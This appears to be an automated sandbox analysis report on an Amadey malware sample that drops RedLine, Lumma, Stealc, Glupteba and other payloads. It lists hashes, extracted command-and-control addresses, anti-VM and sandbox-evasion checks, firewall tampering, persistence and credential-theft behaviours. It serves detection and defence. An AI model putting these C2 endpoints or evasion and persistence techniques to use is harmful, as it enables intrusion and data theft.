amadey | 4bc9589717c9638214386fa4febb05d512130f1ea4fa45dfe4b19e793ec8349e

Analysis

max time kernel
109s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
09/04/2024, 22:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5d4f53ab1cf64d5e32b87c37aebcdc3c.exe
Size

1.9MB
MD5

5d4f53ab1cf64d5e32b87c37aebcdc3c
SHA1

803618a4f5d22fff34727c647053a773ef13a614
SHA256

4bc9589717c9638214386fa4febb05d512130f1ea4fa45dfe4b19e793ec8349e
SHA512

69a694a35401ee5bfcb3a3d34090efb0f46e53540c3a59bfc1e5584579b1e66e4e64f9c595c6940c031c0936ddb2fbea77bdac304f7039ca3c9f1bd710da92d6
SSDEEP

49152:JRR0lHLZ6fRL8UIOLBskOkc5scv4fLpNv93NjRYJ:JwlrcJL8vOL3Gv4jrv93NjR

Malware Config

Extracted

Family

amadey

Version

4.18

http://193.233.132.56

Attributes

install_dir
09fd851a4f
install_file
explorha.exe
strings_key
443351145ece4966ded809641c77cfa8
url_paths
/Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

amadey

Version

4.17

http://185.215.113.32

Attributes

install_dir
00c07260dc
install_file
explorgu.exe
strings_key
461809bd97c251ba0c0c8450c7055f1d
url_paths
/yandex/index.php

rc4.plain

Extracted

Family

redline

Botnet

@OLEH_PSP

185.172.128.33:8970

Extracted

Family

redline

Botnet

LiveTraffic

4.185.137.132:1632

Extracted

Family

stealc

http://52.143.157.84

Attributes

url_path
/c73eed764cc59dcb.php

Extracted

Family

lumma

https://affordcharmcropwo.shop/api

https://cleartotalfisherwo.shop/api

https://worryfillvolcawoi.shop/api

https://enthusiasimtitleow.shop/api

https://pillowbrocccolipe.shop/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect ZGRat V1 3 IoCs

resource	yara_rule
behavioral2/files/0x0002000000021d42-359.dat	family_zgrat_v1
behavioral2/files/0x000700000002325d-416.dat	family_zgrat_v1
behavioral2/files/0x0008000000023260-470.dat	family_zgrat_v1

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 2 IoCs

resource	yara_rule
behavioral2/memory/5944-1186-0x0000000000400000-0x0000000003111000-memory.dmp	family_glupteba
behavioral2/memory/6072-1189-0x0000000000400000-0x0000000003111000-memory.dmp	family_glupteba

Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	yDECol5ophMq6V7pbbaY2iaj.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 5 IoCs

resource	yara_rule
behavioral2/files/0x0008000000023258-406.dat	family_redline
behavioral2/files/0x000700000002325b-405.dat	family_redline
behavioral2/files/0x000700000002325d-416.dat	family_redline
behavioral2/memory/5116-491-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline
behavioral2/files/0x000900000002327f-759.dat	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Stealc
Stealc is an infostealer written in C++.
stealer stealc
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e763ecc4e7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorgu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	random.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	yDECol5ophMq6V7pbbaY2iaj.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5d4f53ab1cf64d5e32b87c37aebcdc3c.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	amert.exe

Blocklisted process makes network request 4 IoCs

flow	pid	Process
65	2336	rundll32.exe
71	4328	rundll32.exe
167	4824	32456.exe
169	3528	rundll32.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3164	netsh.exe
5668	netsh.exe

Checks BIOS information in registry 2 TTPs 20 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5d4f53ab1cf64d5e32b87c37aebcdc3c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	yDECol5ophMq6V7pbbaY2iaj.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	yDECol5ophMq6V7pbbaY2iaj.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e763ecc4e7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorgu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5d4f53ab1cf64d5e32b87c37aebcdc3c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e763ecc4e7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorgu.exe

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	HuFE6cgsWKFzm3uAJr97ze1v.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	5d4f53ab1cf64d5e32b87c37aebcdc3c.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	844b18c601.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	NewB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	explorha.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	explorgu.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	regasm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	Install.exe

Executes dropped EXE 36 IoCs

pid	Process
4280	explorha.exe
4444	e763ecc4e7.exe
1120	amert.exe
4344	explorha.exe
4488	844b18c601.exe
3328	explorgu.exe
3528	explorha.exe
2324	alexxxxxxxx.exe
4908	propro.exe
3008	Traffic.exe
4824	32456.exe
4400	goldprimeldlldf.exe
1152	NewB.exe
2812	swiiiii.exe
5276	koooooo.exe
5364	random.exe
5796	file300un.exe
5964	jok.exe
5284	HuFE6cgsWKFzm3uAJr97ze1v.exe
5660	swiiii.exe
5944	g3ZTceA91pUXTsj4t2lBlweN.exe
6072	sNtoOhN5YbAquQ7j8Vio7RcY.exe
6132	u42s.0.exe
5412	u42s.1.exe
3272	zqpmw8ehQbfUaKbSiWpjFTXC.exe
3504	zqpmw8ehQbfUaKbSiWpjFTXC.exe
2912	zqpmw8ehQbfUaKbSiWpjFTXC.exe
1412	zqpmw8ehQbfUaKbSiWpjFTXC.exe
3500	zqpmw8ehQbfUaKbSiWpjFTXC.exe
5792	s2sXXUlqusSNBDWzK7CGnwUt.exe
5984	sNtoOhN5YbAquQ7j8Vio7RcY.exe
5852	g3ZTceA91pUXTsj4t2lBlweN.exe
5772	Install.exe
700	yDECol5ophMq6V7pbbaY2iaj.exe
5256	KdVOnaSad0K1ZRkEZpX1Ebcn.exe
5268	Install.exe

Identifies Wine through registry keys 2 TTPs 8 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Wine	random.exe
Key opened	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Wine	5d4f53ab1cf64d5e32b87c37aebcdc3c.exe
Key opened	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Wine	e763ecc4e7.exe
Key opened	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Wine	amert.exe
Key opened	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Wine	explorgu.exe
Key opened	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Wine	explorha.exe

Loads dropped DLL 13 IoCs

pid	Process
4600	rundll32.exe
2336	rundll32.exe
4328	rundll32.exe
5948	rundll32.exe
5980	rundll32.exe
3528	rundll32.exe
3272	zqpmw8ehQbfUaKbSiWpjFTXC.exe
3504	zqpmw8ehQbfUaKbSiWpjFTXC.exe
2912	zqpmw8ehQbfUaKbSiWpjFTXC.exe
1412	zqpmw8ehQbfUaKbSiWpjFTXC.exe
3500	zqpmw8ehQbfUaKbSiWpjFTXC.exe
5464	RegAsm.exe
5464	RegAsm.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x00070000000232a6-1202.dat	themida
behavioral2/memory/700-1210-0x00007FF6E4100000-0x00007FF6E4970000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e763ecc4e7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000042001\\e763ecc4e7.exe"	explorha.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\random.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1001084001\\random.exe"	explorgu.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	yDECol5ophMq6V7pbbaY2iaj.exe

Enumerates connected drives 3 TTPs 4 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\D:	zqpmw8ehQbfUaKbSiWpjFTXC.exe
File opened (read-only)	\??\F:	zqpmw8ehQbfUaKbSiWpjFTXC.exe
File opened (read-only)	\??\D:	zqpmw8ehQbfUaKbSiWpjFTXC.exe
File opened (read-only)	\??\F:	zqpmw8ehQbfUaKbSiWpjFTXC.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
138	pastebin.com
139	pastebin.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
192	ipinfo.io
193	ipinfo.io

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x00070000000231fd-110.dat	autoit_exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy	yDECol5ophMq6V7pbbaY2iaj.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	yDECol5ophMq6V7pbbaY2iaj.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	yDECol5ophMq6V7pbbaY2iaj.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	yDECol5ophMq6V7pbbaY2iaj.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

pid	Process
4876	5d4f53ab1cf64d5e32b87c37aebcdc3c.exe
4280	explorha.exe
4444	e763ecc4e7.exe
1120	amert.exe
4344	explorha.exe
3328	explorgu.exe
3528	explorha.exe
5364	random.exe
700	yDECol5ophMq6V7pbbaY2iaj.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 2324 set thread context of 4800	2324	alexxxxxxxx.exe	127
PID 4400 set thread context of 5116	4400	goldprimeldlldf.exe	136
PID 2812 set thread context of 3768	2812	swiiiii.exe	142
PID 5276 set thread context of 5392	5276	koooooo.exe	174
PID 5796 set thread context of 5956	5796	file300un.exe	161
PID 5660 set thread context of 5464	5660	swiiii.exe	175

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\explorha.job	5d4f53ab1cf64d5e32b87c37aebcdc3c.exe
File created	C:\Windows\Tasks\explorgu.job	amert.exe
File created	C:\Windows\Tasks\bvsYAGfGVfhExjZmnp.job	schtasks.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3308	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 6 IoCs

pid	pid_target	Process	procid_target
5168	2812	WerFault.exe	140
5480	5276	WerFault.exe	146
1424	5284	WerFault.exe	166
5752	6072	WerFault.exe	171
4684	5944	WerFault.exe	170
2956	6132	WerFault.exe	176

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u42s.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u42s.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u42s.1.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	u42s.0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	u42s.0.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe

Creates scheduled task(s) 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3164	schtasks.exe
4120	schtasks.exe
5084	schtasks.exe
1692	schtasks.exe
5148	schtasks.exe
5492	schtasks.exe

Enumerates system info in registry 2 TTPs 7 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	g3ZTceA91pUXTsj4t2lBlweN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time"	g3ZTceA91pUXTsj4t2lBlweN.exe
